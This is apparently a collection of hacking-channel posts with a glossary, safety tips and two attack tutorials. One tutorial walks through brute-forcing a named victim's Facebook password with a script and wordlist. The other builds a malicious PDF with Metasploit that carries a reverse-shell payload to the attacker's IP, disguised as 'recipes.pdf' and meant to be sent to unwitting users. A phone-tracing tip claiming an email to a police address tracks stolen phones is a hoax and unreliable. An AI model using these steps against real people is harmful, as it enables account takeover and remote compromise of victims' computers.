Latest News
🔰BLACK HAT HACKERS🔰
Like all hackers, black hat hackers usually have extensive knowledge about breaking into computer networks and bypassing security protocols. They are also responsible for writing malware, which is a method used to gain access to these systems.
Their primary motivation is usually for personal or financial gain, but they can also be involved in cyber espionage, protest or perhaps are just addicted to the thrill of cybercrime. Black hat hackers can range from amateurs getting their feet wet by spreading malware, to experienced hackers that aim to steal data, specifically financial information, personal information and login credentials. Not only do black hat hackers seek to steal data, they also seek to modify or destroy data as well.
📌WHITE HAT HACKERS📌
A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and asses their security.White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them.
📌GREY HAT HACKERS📌
The term "grey hat", alternatively spelled as "greyhat" or "gray hat", refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker.
1️⃣. First lets know something about Brute force attacks, “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).
2️⃣. In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”
But, In our case I’ll be using a Python script and a Long Dictionary Of passwords.
‼️Requirement‼️
A Kali Machine / Or Any Python Engine Will work!
Facebook.py ( v1 or v2 )
A FaceBook id
CrackStation Word List! Which I'll upload shortly.
📌STEPS
📍Step 1. Install Python-mechanize using command mention below
~#apt-get install python-mechanize
📍Step 2. Add facebook.py using the command below
~# chmod +x facebook.py [*]
~# python facebook.py
📍Step 3. Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,
📍Step 4. Now Give The "Path" Of Your CrackStation Word list
📍Step 5. Now it will try all passwords present in the word list, So relax as it will take time depending on speed of your processor and password strength of your victim!
🚩Adware − Adware is software designed to force pre-chosen ads to display on your system.
🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data.
🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.
🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.
🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.
🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.
🚩Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
🚩Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.
🚩Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.
🚩Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.
🚩DDoS − Distributed denial of service attack.
🚩Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.
🚩Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.
🚩Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.
🚩Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.
🚩Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.
🚩Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.
🚩Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.
🚩Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.
🚩Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.
Share and support us 👇
🆔 @thebughacker
❌ Don't forget to give us credits ❌
Step 1)Run Metasploit
Step2) Find the Appropriate Exploit.
I will search metasploits database for an exploit for adobe pdf on windows, using this command:
●Code:msf > search type:exploit platform:windows adobe pdf
You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:
●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 3) Set the Payload
I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4) Set the exploit options
First, display the required options for the exploit:
●Code:msf > exploit (adobe_pdf_embedded_exe) > show options
You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":
●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf
The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf
Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8
Step5) Run the Exploit.
Now that all the options are set, we can run the exploit like this:
●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy as fucking smile :)
Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful the please share my effort in other groups and channels .
◽◽◽◽◽◽◽◽◽◽
If you lose your #mobile phone, you can #trace it without going to the police.
➖➖➖➖➖➖➖➖➖➖
Most of us always fear that our phones may be #stolen at any time.
➖➖➖➖➖➖➖➖➖➖
Each phone carries a unique
#IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.
This is how it works:
➖➖➖➖➖➖➖➖➖➖
1. Dial \*#06# from your mobile.
➖➖➖➖➖➖➖➖➖➖
2. Your mobile phone shows a unique 15 digit.
➖➖➖➖➖➖➖➖➖➖
3. Note down this number at a secure place except in your mobile phone itself as this is the #number which will help trace your phone in case of theft.
➖➖➖➖➖➖➖➖➖➖
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:
Your name:
Address:
Phone model:\_
Make:\_
Last used No.:\_
E-mail for communication:\_
Missed date:\_
IMEI No :\_
➖➖➖➖➖➖➖➖➖➖
5.Your Mobile will be #traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your #email.
➖➖➖➖➖➖➖➖➖➖
6. After this, you can inform the Police with the details you got
▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:
👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.
▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.
👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.
▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT
👉After identification, click "Start" for scanning.
Please be patient about the process.
▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
👉You will be able to review all the details of desired
data.
▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.
Some of you may be aware of this difference, but it is
worth sharing for many that are not.
The main difference between http:// and https:// is all about keeping you secure.
HTTP stands for Hyper Text Transfer Protocol.
The S (big surprise) stands for "Secure". If you visit a Website or web page, and look at the address in the web browser, it is likely begin with the following: http:///.
This means that the website is talking to your browser using
the regular unsecured language. In other words, it is possible for someone to "eavesdrop" on your computer's conversation with the Website. If you fill out a form on the website, someone might see the information you send to that site.
This is why you never ever enter your credit card number in an
Http website! But if the web address begins with https://, that means your computer is talking to the website in a
Secure code that no one can eavesdrop on.
Now, you understand why this is so important, right?
If a website ever asks you to enter your Credit/Debit card
Information, you should automatically look to see if the web
address begins with https://.
If it doesn't, you should NEVER enter sensitive Information such as a credit/debit card number.
PLS PASS IT ON (You may save someone a lot of grief).
While checking the name of any website, first look for the domain extension (.com or .org, .co.in, .net etc). The name just before this is the domain name of the website. Eg, in the above example, http://amazon.diwali-festivals.com, the word before .com is "diwali-festivals" (and NOT "amazon"). So, this webpage does not belong to amazon.com but belongs to "diwali-festivals.com", which we all haven't heard of before.
You can similarly check for bank frauds.
Before your ebanking logins, make sure that the name just before ".com" is the name of your bank. "Something.icicibank.com" belongs to icici; but, icicibank.some1else.com belongs to "some1els.
You've hopefully learned something new, now please share and educate others.
